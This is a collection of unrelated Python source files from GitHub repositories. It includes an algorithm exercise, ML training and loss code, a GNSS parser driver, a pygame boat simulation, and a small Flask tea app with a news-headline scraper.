+{"seq_id":"40979126630","text":"from sys import stdin\nfrom collections import defaultdict\nstdin = open(\"Greedy/input.txt\",'r')\ninput = stdin.readline\n\nn, k = map(int, input().strip().split())\nelect = list(map(int, input().strip().split()))\nresult = 0\n\nin_plug = defaultdict(int)\ns_idx = i = 0\n\nwhile sum(in_plug.values()) < n: # 플러그 개수만큼 우선 사용 차감 반영\n if not in_plug[elect[i]]: # 아직 플러그에 안 꽂은 제품이면\n in_plug[elect[i]] = 1 # 플러그에 사용중 표시\n # 이미 꽂혀있는 제품이면\n s_idx += 1\n i += 1\n if i == k-1:\n break\n\n\nfor i in range(s_idx, len(elect)):\n breaker = False\n if not in_plug[elect[i]]: # 아직 플러그에 안 꽂은 제품이면 무언가 뽑아야 함\n del in_plug[elect[i]]\n # 다음에 안 쓰는 제품이 꽂혀있으면 먼저 뽑는다.\n for e in in_plug.keys():\n if e not in elect[i+1:]:\n del in_plug[e]\n result += 1 \n in_plug[elect[i]] = 1\n now = i\n breaker = True\n break\n \n if not breaker:\n # 모두 다음에도 사용하는 제품이면,\n # 플러그에 꽂힌 제품들이 언제 사용되는지 보고,\n # 가장 나중에 사용될 제품을 뽑는다.\n candidates = {}\n while True:\n for e in in_plug.keys():\n for j in range(i, k):\n if e == elect[j]: # 중복값 들어오면 작은 값으로 넣는 과정 필요\n candidates[e] = [j, e]\n break\n break\n \n candidates = sorted(candidates.values(), key= lambda x: x[0], reverse=True)\n del in_plug[candidates[0][1]]\n result += 1\n in_plug[elect[i]] = 1 # 플러그에 사용중 표시\n \nprint(result)","repo_name":"Suyeon-B/week04_team","sub_path":"suyeon/Greedy/1700 멀티탭 스케줄링 reretry.py","file_name":"1700 멀티탭 스케줄링 reretry.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21873944922","text":"from .fitter import AutoCatFitter\nfrom .predictor import AutoCatPredictor\nfrom .file_io import DataReader\nfrom .scaler import Scaler\nfrom .defaults import BATCH_SIZE\nfrom .base import AutoCatTrain\nimport numpy as np\n\n\nclass AutoCat(object):\n def __init__(self, reference_lib=None):\n self.scaler = Scaler()\n self.metrics = {}\n self.data_r = \"\"\n self.data_len = 0\n self.batch_size = BATCH_SIZE\n self.reference_lib = reference_lib\n\n def fit(\n self, data, optimise_time=3600, weight=False\n ): # if file, expected to have header row\n smiles, targets = self.check_input(data)\n self.scaler.get_params(targets)\n training_params = AutoCatTrain().train_params(targets)\n\n if self.data_r == \"\" or self.data_len <= self.batch_size:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n )\n else:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n batch=True,\n data_r=self.data_r,\n batch_size=self.batch_size,\n data_len=self.data_len,\n )\n\n if weight:\n self.fitter.weight_labels(targets)\n\n if optimise_time > 0:\n self.fitter.optimise_search(smiles, targets, time_budget=optimise_time)\n\n self.metrics = self.fitter.fit(smiles, targets)\n return self.metrics\n\n def predict(self, data, smiles_col=0):\n if type(data) == np.ndarray:\n smiles = data\n elif type(data) == str:\n data_r = DataReader(data)\n smiles = data_r.read_smiles(smiles_col=smiles_col)\n\n if self.metrics != {}: # If there is a fitter trained in this AutoCat object\n self.predictor = AutoCatPredictor(features_file=self.reference_lib)\n self.predictor.set_model(self.fitter.get_model())\n\n return self.predictor.predict(smiles, self.scaler)\n\n def save(self, file_path, as_onnx=False):\n file_name = file_path.split(\".\")\n if as_onnx:\n if self.y.shape[1] > 1:\n raise Exception(\"Multiregression models cannot be saved in onnx format\")\n self.fitter.save_model(file_name[0] + \".onnx\", \"onnx\")\n else:\n self.fitter.save_model(file_name[0] + \".cbm\", \"cbm\")\n self.fitter.save_metrics(file_name[0] + \"_metrics.json\")\n self.fitter.save_weights(file_name[0] + \"_weights.json\")\n self.scaler.save(file_name[0] + \"_scaler.json\")\n\n def load(self, file_path):\n self.predictor = AutoCatPredictor(features_file=self.reference_lib)\n file_name = file_path.split(\".\")\n if file_name[-1] == \"onnx\":\n self.predictor.load_onnx(file_path)\n elif file_name[-1] == \"cbm\":\n self.predictor.load_cbm(file_path)\n self.scaler.load(file_name[0] + \"_scaler.json\")\n\n # TO DO save and load training params\n def retrain(self, model_path, data):\n file_name = model_path.split(\".\")\n self.scaler.load(file_name[0] + \"_scaler.json\")\n smiles, targets = self.check_input(data)\n training_params = AutoCatTrain().train_params(targets)\n\n if self.data_r == \"\" or self.data_len <= self.batch_size:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n )\n else:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n batch=True,\n data_r=self.data_r,\n batch_size=self.batch_size,\n data_len=self.data_len,\n )\n self.fitter.load_weights(file_name[0] + \"_weights.json\")\n\n self.metrics = self.fitter.fit(smiles, targets, retrain=model_path)\n return self.metrics\n\n def check_input(self, data):\n if type(data) == list:\n self.data_len = len(data[0])\n smiles = data[0]\n targets = data[1]\n\n elif type(data) == str:\n self.data_r = DataReader(data)\n self.data_len = self.data_r.read_length()\n if self.data_len <= self.batch_size:\n smiles, targets = self.data_r.get_fold(0, self.data_len)\n else:\n smiles, targets = self.data_r.get_fold(0, self.batch_size)\n if self.data_len % self.batch_size != 0:\n print(\n \"Warning - training dataset is not a multiple of batch size:\",\n self.batch_size,\n )\n return smiles, targets\n","repo_name":"ersilia-os/autocat-chem","sub_path":"core/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"4986401896","text":"import tensorflow as tf\n\nfrom Caster.utils import shape_utils\n\n\nclass SequenceCrossEntropyLoss(object):\n \"\"\"\n 识别文本序列与标签文本序列的交叉熵损失\n \"\"\"\n def __init__(self,\n sequence_normalize=None,\n sample_normalize=None,\n weight=None):\n\n self._sequence_normalize = sequence_normalize\n self._sample_normalize = sample_normalize\n self._weight = weight\n\n \n def __call__(self, logits, labels, lengths, scope=None):\n \"\"\"\n Args:\n logits: float32 tensor with shape [batch_size, max_time, num_classes]\n labels: int32 tensor with shape [batch_size, max_time]\n lengths: int32 tensor with shape [batch_size]\n \n tf.nn.sparse_softmax_cross_entropy_with_logits:\n A common use case is to have logits and labels of shape [batch_size, num_classes], \n but higher dimensions are supported, in which case the dim-th dimension is assumed \n to be of size num_classes. logits and labels must have the same dtype (either float16, \n float32, or float64).\n \"\"\"\n with tf.name_scope(scope, 'SequenceCrossEntropyLoss', [logits, labels, lengths]):\n # 原始交叉熵损失\n raw_losses = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits\n )\n batch_size, max_time = shape_utils.combined_static_and_dynamic_shape(labels)\n \n # 计算指定序列长度以内的损失\n mask = tf.less(tf.tile([tf.range(max_time)],[batch_size,1]), tf.expand_dims(lengths,1), name='mask')\n masked_losses = tf.multiply(raw_losses, tf.cast(mask, tf.float32), name='masked_losses') # => [batch_size, max_time]\n row_losses = tf.reduce_sum(masked_losses, 1, name='row_losses') # 序列不同时刻损失值和 [batch_size]\n \n # 损失序列长度归一化\n if self._sequence_normalize:\n loss = tf.truediv(row_losses, tf.cast(tf.maximum(lengths),1),tf.float32, name='seq_normed_losses')\n \n loss = tf.reduce_sum(row_losses)\n \n # 损失batch归一化\n if self._sample_normalize:\n loss = tf.truediv(loss, tf.cast(tf.maximum(batch_size, 1),tf.float32))\n\n # 交叉熵损失权值\n if self._weight:\n loss = loss * self._weight\n return loss\n \n\n\nclass STNRegressionLoss(object):\n \"\"\"\n STN矫正定位网络回归损失(平方损失)\n \"\"\"\n def __init__(self, weight):\n self._weight = weight\n\n\n def __call__(self, prediction, target, scope=None):\n \"\"\"\n Args:\n prediction: float32 tensor with shape [batch_size, 2 * num_control_point]\n target: int32 tensor with shape [batch_size, 2 * num_control_point]\n \"\"\"\n with tf.name_scope(scope, 'STNRegressionLoss', [prediction, target]):\n diff = prediction - target\n losses = tf.reduce_sum(tf.square(diff), axis=1) # 2K维度计算损失和\n loss = tf.reduce_mean(losses, axis=0) # batch维度计算平均损失\n\n # 关键点回归损失权值\n if self._weight:\n loss = loss * self._weight\n return loss\n","repo_name":"ChenCongGit/Caster","sub_path":"model/model/Loss.py","file_name":"Loss.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"6355932004","text":"\n# Import modules.\nimport os\nimport time\nfrom datetime import date, timedelta\nfrom gnsscal import date2gpswd\nfrom Parsing.support_parsing_functions import parse_file\n\nfilesep = os.sep\n\nstart_time = time.time()\n\n\ndef parse_binary_file(binary_file, exe_dir, model):\n # Obtain directory to file.\n week_number, week_day_number = int(binary_file[:4]), int(binary_file[5])\n binary_dir = model.binary_dir + filesep + str(week_number) + filesep + binary_file\n\n # Determine if the file exists within binary_dir. Otherwise, return an error.\n if model.reduced:\n success, msg = parse_file(binary_dir, model.CSV_dir, exe_dir, model.PRNs_to_parse, week_number,\n week_day_number, time_range=model.set_time_range, start_time=model.time_start_value,\n end_time=model.time_end_value)\n if not success:\n return False, msg\n if model.raw:\n success, msg = parse_file(binary_dir, model.CSV_dir, exe_dir, model.PRNs_to_parse, week_number,\n week_day_number, reduced_or_raw='raw', time_range=model.set_time_range,\n start_time=model.time_start_value, end_time=model.time_end_value)\n if not success:\n return False, msg\n return True, 'Success'\n\n\n# ----------- PARSING (NovAtel receivers only) ------------ #\ndef run_parsing(model, exe_dir):\n # Process the dates. Obtain the names of the binary files.\n start_year, start_month, start_day = model.start_date\n end_year, end_month, end_day = model.end_date\n number_of_days = (date(end_year, end_month, end_day) - date(start_year, start_month, start_day)).days\n if number_of_days < 0:\n print('Error: The selected end date must be after the start date.')\n days = [date(start_year, start_month, start_day) + timedelta(days=i) for i in range(number_of_days + 1)]\n binary_files = [str(date2gpswd(day)[0]) + '_' + str(date2gpswd(day)[1]) + '_00_' + model.receiver_name + '.GPS' for\n day in days]\n\n # Parse the binary files.\n for binary_file in binary_files:\n\n # Parse file.\n success, error = parse_binary_file(binary_file, exe_dir, model)\n if not success:\n print(error)\n","repo_name":"nicolasgapa/EISA","sub_path":"EISA-master/Parsing/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"6412405868","text":"import pygame.display\nfrom math import sin, cos, radians, copysign\n\n\nclass Boat:\n def __init__(self, pos_x, pos_y):\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.vel = 10\n self.heading = 90\n self.rudder = 0\n self.turn = 0\n\n self.length = 100\n self.width = 38\n\n self.boat_img = pygame.image.load('assets/boat_sprite.png')\n self.boat_img = pygame.transform.smoothscale(self.boat_img, (self.length, self.width))\n\n self.water_img_width = 450\n self.water_img_height = 450\n self.water_img = pygame.image.load('assets/water_sprite.jpg')\n self.water_img = pygame.transform.scale(self.water_img, (self.water_img_width, self.water_img_height))\n\n def update(self):\n self.heading = self.heading % 360\n\n max_rudder = 50\n max_vel = 40\n\n if self.rudder > max_rudder:\n self.rudder = max_rudder\n elif self.rudder < -max_rudder:\n self.rudder = -max_rudder\n\n if self.vel > max_vel:\n self.vel = max_vel\n elif self.vel < 0:\n self.vel = 0\n\n self.move()\n\n max_width = pygame.display.Info().current_w\n max_height = pygame.display.Info().current_h\n if self.pos_x > max_width:\n self.pos_x = 0\n if self.pos_x < 0:\n self.pos_x = max_width\n if self.pos_y > max_height:\n self.pos_y = 0\n if self.pos_y < 0:\n self.pos_y = max_height\n\n def move(self):\n self.turn += copysign(self.rudder ** 2, self.rudder) / 200\n\n if self.turn > 50:\n self.turn = 50\n elif self.turn < -50:\n self.turn = -50\n\n self.turn = self.turn * min((self.vel / 200 + 0.90), 0.95)\n\n if self.vel == 0:\n self.turn = 0\n\n self.heading += self.turn / ((self.vel + 10) * 4)\n self.turn = self.turn * 0.95\n\n self.pos_x = self.pos_x + self.vel * cos(radians(self.heading)) / 10\n self.pos_y = self.pos_y - self.vel * sin(radians(self.heading)) / 10\n","repo_name":"AleksanderZawisza/Fuzzy-Boat","sub_path":"app/boat.py","file_name":"boat.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23070263146","text":"import os\nfrom forms import InfoForm, AddTeaForm\n\nfrom flask import Flask, request, render_template, flash, session, redirect, url_for, session\n\nfrom wtforms.validators import DataRequired\nimport shutil\nimport requests\nfrom datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom validate_email import validate_email\nimport csv\nimport re\nfrom bs4 import BeautifulSoup\nfrom flask_restful import Api,Resource\n\n\n# This grabs our directory\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\n# Key for Forms\napp.config['SECRET_KEY'] = 'mysecretkey'\n\n# Connects our Flask App to our Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# create sqlite db \ndb = SQLAlchemy(app)\n# Add on migration capabilities in order to run terminal commands\nMigrate(app,db)\napi = Api(app)\n\n###################################\n# MODELS\n# it inherit from db.Model class\nclass User(db.Model):\n\n # The default table name will be the class name\n __tablename__ = 'User'\n\n ## CREATE THE COLUMNS FOR THE TABLE \n # Primary Key column, unique id for each user\n id = db.Column(db.Integer,primary_key=True)\n # Username\n username = db.Column(db.Text)\n # User email\n email = db.Column(db.Text)\n\n # This is a one-to-one relationship\n # A user can have only one fav type of tea\n tea = db.relationship('Tea',backref='user',uselist=False)\n\n # This sets what an instance in this table \n def __init__(self,username,email):\n self.username = username\n self.email = email\n\n def json(self):\n return {'username': self.username, 'email': self.email }\n\n def __repr__(self):\n if self.tea:\n # This is the string representation of a user in the model\n return f\"User {self.username}'s email' is {self.email}, user ID:{self.id}, his/her fav tea is {self.tea.tea_choice}\"\n else:\n return f\"User {self.username}'s email' is {self.email}, user ID:{self.id}, no tea yet.\"\n \n def report_tea(self):\n print(\"Here is my fav tea!\")\n print(self.tea) \n \n\nclass Tea(db.Model):\n\n # The default table name will be the class name\n __tablename__ = 'Tea'\n\n ## CREATE THE COLUMNS FOR THE TABLE \n # Primary Key column, unique id for each user\n id = db.Column(db.Integer,primary_key=True)\n # Username\n temperature = db.Column(db.Text)\n # User email\n tea_choice = db.Column(db.Text)\n\n # Connect the tea to the user that owns it.\n user_id = db.Column(db.Integer,db.ForeignKey('User.id'))\n\n # This sets what an instance in this table \n def __init__(self,temperature,tea_choice,user_id):\n self.temperature = temperature\n self.tea_choice = tea_choice\n self.user_id = user_id\n\n def json(self):\n return {'temperature': self.temperature, 'tea_choice': self.tea_choice, 'user_id': self.user_id,}\n\n def __repr__(self):\n # This is the string representation of a tea in the model\n if self.user_id:\n return f\"Tea {self.tea_choice}'s temperature is {self.temperature}, ID:{self.id}, user is {self.user_id}\"\n else:\n return f\"Tea {self.tea_choice}'s temperature is {self.temperature}, ID:{self.id}, no users yet\"\n\n\n\nproxies = {'http' : 'http://10.10.0.0:0000', \n 'https': 'http://120.10.0.0:0000'}\n\n# library to generate user agent\nfrom user_agent import generate_user_agent\n\nurl='https://www.nytimes.com/'\n\n# generate a user agent\nheaders = {'User-Agent': generate_user_agent(device_type=\"desktop\", os=('mac', 'linux'))}\n#headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.63 Safari/537.36'}\npage_response = requests.get(url, timeout=5, headers=headers)\n\n\n# website scraping\ntitles_list = []\n\n\ndef scraper():\n try:\n data = requests.get(url, timeout=5)\n if page_response.status_code == 200:\n\n html = BeautifulSoup(data.text, 'html.parser')\n\n titles = html.select('h2 span')\n\n try:\n for title in titles:\n titles_list.append(title.string)\n\n except IndexError:\n return 'No matching element found.' \n\n\n # write titles_list into csv file\n with open('index.csv', 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([titles_list, datetime.now()])\n else:\n print(page_response.status_code)\n # notify, try again\n except requests.Timeout as e:\n print(\"It is time to timeout\")\n print(str(e))\n return titles_list \n\nscraper()\n\n\n@app.route('/tea_form', methods=['GET', 'POST'])\ndef tea():\n # Create instance of the form.\n form = InfoForm()\n \n # Grab the data from the breed on the form.\n if form.validate_on_submit(): \n session['temperature'] = form.temperature.data\n session['tea_choice'] = form.tea_choice.data\n\n flash(f\"You just changed your tea_choice to: {session['tea_choice']}\")\n\n return redirect(url_for(\"thankyou\"))\n\n return render_template('tea.html', form=form)\n\n@app.route('/add_tea', methods=['GET', 'POST'])\ndef add_tea():\n # Create instance of the form.\n form = AddTeaForm()\n \n # Grab the data from the breed on the form.\n if form.validate_on_submit(): \n temperature = form.temperature.data\n tea_choice = form.tea_choice.data\n user_id = User.query.first().id\n \n # Add new tea to DB\n new_tea = Tea(temperature,tea_choice,user_id)\n db.session.add(new_tea)\n db.session.commit()\n\n\n return redirect(url_for(\"list_tea\"))\n\n return render_template('add_tea.html', form=form)\n\n@app.route('/userslist')\ndef list_user():\n # Grab a list of users from database.\n users = User.query.all()\n return render_template('userslist.html', users=users)\n\n@app.route('/tealist')\ndef list_tea():\n # Grab a list of tea from database.\n tea = Tea.query.all()\n return render_template('tealist.html', tea=tea)\n\n@app.route('/')\ndef index():\n return render_template('index.html',titles_list=titles_list)\n\n@app.route('/signup_form')\ndef signup_form():\n return render_template('signup_form.html')\n\n@app.route('/thankyou')\ndef thankyou():\n username = request.args.get('username')\n \n return render_template('thankyou.html',username=username)\n\n@app.route('/cn/')\ndef cn(name):\n return render_template('chinese.html',name=name)\n\n\n@app.route('/report')\ndef report(): \n username = request.args.get('username')\n email = request.args.get('email')\n\n lower_letter = False\n upper_letter = False\n num_end = False\n validatedemail = False\n\n if (username and email):\n lower_letter = any(letter.islower() for letter in username)\n upper_letter = any(letter.isupper() for letter in username)\n num_end = username[-1].isdigit()\n validatedemail = validate_email(email)\n\n report = lower_letter and upper_letter and num_end and validatedemail\n \n if report:\n # if user info is validated, pass it to DB\n new_user = User(username, email)\n db.session.add(new_user)\n db.session.commit()\n\n return render_template('report.html',\n username=username,report=report,\n lower_letter=lower_letter,\n upper_letter=upper_letter,\n num_end=num_end,\n validatedemail = validatedemail)\n else:\n return redirect(url_for('index'))\n\n@app.route('/user/')\ndef user(name):\n return '
This is a page for {}
'.format(name.upper())\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'),404\n\nclass AllTea(Resource):\n\n def get(self):\n tea = Tea.query.all()\n\n if tea:\n # return json of teas\n return [t.json() for t in tea]\n else:\n return {'tea_choice':'not found'}, 404\n\n\nclass AllUsers(Resource):\n\n def get(self):\n users = User.query.all()\n\n if users:\n # return json of users\n return [user.json() for user in users]\n else:\n return {'username':'not found'}, 404\n\napi.add_resource(AllTea,'/teas')\napi.add_resource(AllUsers,'/users')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"AbbyBiying/Tea-Time","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"71100509447","text":"import random\n\ndef binary_search(L, t, low, high):\n while low <= high:\n mid = (low + high) // 2\n if L[mid] == t:\n return True\n elif L[mid] < t:\n low = mid + 1\n else:\n high = mid - 1\n return False\n\n\nif __name__ == \"__main__\":\n L = [random.randint(0,30) for _ in range(20)]\n L.sort()\n\n print(L)\n print(binary_search(L, 14, 0, len(L)-1))","repo_name":"douzujun/Python-Foundation-Suda","sub_path":"上机题目和面试题整理/Python-Foundation-Suda-master/02_MOOC习题/04_2二分查找.py","file_name":"04_2二分查找.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"16"}
+{"seq_id":"36467695351","text":"# -*- coding:utf-8 -*-\nfrom celery import Celery\n\n\napp = Celery('tasks')\n\napp.config_from_object(\"celeryconfig\")\n\n\n\n@app.task\ndef add(x, y):\n return x + y\n\n@app.task\ndef error_handler(uuid):\n result = AsyncResult(uuid)\n exc = result.get(propagate=False)\n print('Task {0} raised exception: {1!r}\\n{2!r}'.format(\n uuid, exc, result.traceback))","repo_name":"ShichaoMa/old-spider","sub_path":"test/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"25013360527","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 8 21:30:29 2019\r\n\r\n@author: Vincent\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport torch\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy.stats import zscore\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom sklearn.model_selection import train_test_split\r\nfrom torch.utils.data import DataLoader\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\nfrom torchvision.models import vgg\r\n\r\n#either uses GPU or CPU, depending if cuda is available\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n\r\n#the neural networks we are testing\r\nclass Net1(nn.Module):\r\n \r\n def __init__(self, num_classes=10):\r\n super(Net1, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(1, 16, kernel_size=4, stride=1, padding=2),\r\n nn.BatchNorm2d(200),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(16, 32, kernel_size=4, stride=1, padding=2),\r\n nn.BatchNorm2d(50),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2))\r\n self.fc = nn.Linear(50*17*17, num_classes)\r\n \r\n def forward(self, x):\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = out.reshape(-1, 50*17*17)\r\n out = self.fc(out)\r\n return out\r\n\r\nclass Net2(nn.Module):\r\n def __init__(self, num_classes=10):\r\n super(Net2, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer4 = nn.Sequential(\r\n nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer5 = nn.Sequential(\r\n nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.fc = nn.Linear(256, num_classes)\r\n \r\n def forward(self, x):\r\n in_size=x.size(0)\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = self.layer3(out)\r\n #print(out.shape)\r\n out = self.layer4(out)\r\n #print(out.shape)\r\n out = self.layer5(out)\r\n #print(out.shape)\r\n out = out.view(in_size, -1)\r\n out = self.fc(out)\r\n return out\r\n\r\nclass Net3(nn.Module):\r\n def __init__(self, num_classes=10):\r\n super(Net3, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer4 = nn.Sequential(\r\n nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer5 = nn.Sequential(\r\n nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer6 = nn.Sequential(\r\n nn.Conv2d(in_channels=256, out_channels=128, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.fc1 = nn.Linear(128, 128)\r\n self.fc2 = nn.Linear(128, num_classes)\r\n \r\n def forward(self, x):\r\n in_size=x.size(0)\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = self.layer3(out)\r\n #print(out.shape)\r\n out = self.layer4(out)\r\n #print(out.shape)\r\n out = self.layer5(out)\r\n #print(out.shape)\r\n out = self.layer6(out)\r\n #print(out.shape)\r\n out = out.view(in_size, -1)\r\n out = self.fc1(out)\r\n out = self.fc2(out)\r\n return out\r\n \r\n#A custom dataset for our images and labels\r\nclass CustomDataset(torch.utils.data.Dataset):\r\n def __init__(self, X_tensor, y_tensor):\r\n self.X_tensor = X_tensor\r\n self.y_tensor = y_tensor\r\n return\r\n def __getitem__(self, index):\r\n self.img = self.X_tensor[index]\r\n label = self.y_tensor[index]\r\n return (self.img,label)\r\n def __len__(self):\r\n return self.X_tensor.size()[0]\r\n\r\n#function that preproceses our images\r\ndef preprocess(images):\r\n \r\n images = images/255\r\n images[images < 0.90] = 0\r\n images[images > 0] = 1\r\n \r\n for i in range(len(images)):\r\n \r\n image = images[i] \r\n image=np.array(image, dtype='uint8') \r\n \r\n contours,_ = cv.findContours(image, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\r\n \r\n largest_area = 0\r\n for contour in contours:\r\n \r\n coor1, coor2, width, height = cv.boundingRect(contour)\r\n \r\n side = max(width, height)\r\n \r\n area = side * side\r\n \r\n if area > largest_area:\r\n largest_area = area\r\n larC1, larC2, larW, larH = coor1, coor2, width, height\r\n \r\n \r\n largest_digit = image[larC2:larC2+larH,larC1:larC1+larW]\r\n \r\n [rows,cols] = largest_digit.shape\r\n if rows>cols:\r\n difference = rows - cols\r\n if difference%2 !=0:\r\n difference += 1 \r\n image = np.concatenate((np.zeros((rows,int(difference/2))),largest_digit,np.zeros((rows,int(difference/2)))), axis=1)\r\n elif rows best_model_accuracy:\r\n \r\n print(\"DAMN!!! Good Job <3!!!\")\r\n torch.save(net.state_dict(), 'best_model.ckpt')\r\n best_model_accuracy = accuracy\r\n \r\n #gives the accuracy of our model on each of the labels, separately\r\n for i in range(10):\r\n print('Accuracy of %d : %2d %%' % (\r\n i, 100 * class_correct[i] / class_total[i]))\r\n \r\n loss_accuracy_lr[epoch, 0] = loss.item() #loss on training set\r\n loss_accuracy_lr[epoch, 1] = (100 * correct / total) #accuracy on valid set\r\n loss_accuracy_lr[epoch, 2] = epoch #nb of epochs\r\n \r\n return best_model_accuracy\r\n\r\n#return the prediction on our validation set, which an array of tensors\r\n#as input (not the dataloader)\r\ndef getPredictionsValidation(test_images):\r\n predicted = np.zeros((len(test_images)))\r\n for i in range(len(test_images)):\r\n image = test_images[i,:,:,:]\r\n image = image.reshape(1,1,64,64)\r\n output = net(image)\r\n _, predicted[i] = torch.max(output.data, 1)\r\n \r\n return predicted\r\n\r\n#return a list of the wrongly labeled images in the test set (aka validation set)\r\ndef getWrongs(predicted, y_tensor_test):\r\n \r\n y_tensor_test = y_tensor_test.numpy()\r\n \r\n wrongs = []\r\n for i in range(len(predicted)):\r\n if predicted[i] != y_tensor_test[i]:\r\n wrongs.append(i)\r\n \r\n return wrongs\r\n\r\n#function that pre process the images for them to be used on the VGG model\r\ndef VGG_get_loaders():\r\n \r\n train_images = pd.read_pickle('train_images.pkl')\r\n train_labels = pd.read_csv('train_labels.csv')\r\n\r\n train_images = preprocess(train_images)\r\n train_images = train_images.reshape((40000,1,64,64))\r\n train_images_3 = np.zeros((40000,3,64,64))\r\n \r\n train_images_3[:,0,:,:] = train_images\r\n train_images_3[:,1,:,:] = train_images\r\n train_images_3[:,2,:,:] = train_images\r\n train_images = train_images_3\r\n \r\n #Pre-Process the csv-files of the labels \r\n train_labels = train_labels.drop(['Id'], axis=1)\r\n train_labels = train_labels.values\r\n train_labels = np.reshape(train_labels, (-1))\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(train_images, train_labels, test_size=0.10, random_state=2)\r\n #X_test, X_rem, y_test, y_rem = train_test_split(X_test, y_test, test_size=0.90, random_state=2)\r\n \r\n X_tensor_train = torch.tensor(X_train) \r\n y_tensor_train = 